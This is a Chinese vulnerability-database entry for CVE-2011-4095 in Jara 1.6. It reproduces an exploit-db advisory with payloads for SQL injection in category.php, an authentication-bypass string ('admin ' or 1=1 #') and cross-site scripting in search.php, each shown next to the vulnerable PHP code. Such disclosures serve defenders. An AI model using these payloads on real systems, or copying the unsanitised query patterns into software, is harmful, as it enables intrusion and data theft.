Jara 跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1120598 漏洞类型 跨站脚本
发布时间 2011-11-03 更新时间 2020-01-22
CVE编号 CVE-2011-4095 CNNVD-ID CNNVD-202001-912
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/18069
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202001-912
|漏洞详情
Jara 1.6版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
|漏洞EXP
#!/Mohammed/bin/YahYa
# Jara v1.6 Multiple Vulnerabilities 
# -------------------------------------------[+]
# download : http://sourceforge.net/projects/jara/files/v1.6/jarav16.zip
# AutHOr   : Or4nG.M4n
# cOntAct  :  priv8te[at]hotmail.com
# versiOn  : v1.6
# Tested   : My Mind (:
# -------------------------------------------[+]
#
[ Exploit ] Sql injection ~ ~
|=> /category.php?id=999999.9'[Here]
# Vulnerable code : category.php
#		@$categoryid = $_REQUEST["id"]; <= [1]
#		$category = jara_get_category($categoryid); <=[2]
#		jara_page_start("Category: ".$category["title"]); <=[3]
#		$query = "select * from jara_posts where categoryid = '$categoryid'"; <=[4]
#		$result = jara_db_query($query); <=[5]
#
[ Exploit ] Auth Bypass ~
|=> admin ' or 1=1 # 
# Vulnerable code : auth_fns.php
#	    function jara_user_authenticate($username, $password) { <=[1]
#		$query = "select * from jara_users where username = '$username' and password = SHA1('$password') limit 1"; <=[2]
#		$result = jara_db_query($query); <=[3]
#
[ Exploit ] Cross Site Scrpting ~
|=> POST : <h1>DDD<h1> => your xss Code
# Vulnerable code : search.php
#			$num_rows = $result->num_rows;
#			echo "<p><strong>$num_rows</strong> results for <strong>".stripslashes($term)."</strong>.</p>";
# ~ End
# -------------------------------------------[+]
#  Greet : sA^Dev!L , xSs m4n , Tryag Team 
# Cyb3r-Crystal , Dr.Banned [Miss u] , i-hmx
# -------------------------------------------[+]
|参考资料

来源:seclists.org

链接:https://seclists.org/oss-sec/2011/q4/193


来源:www.openwall.com

链接:https://www.openwall.com/lists/oss-security/2011/10/31/4


来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2011-4095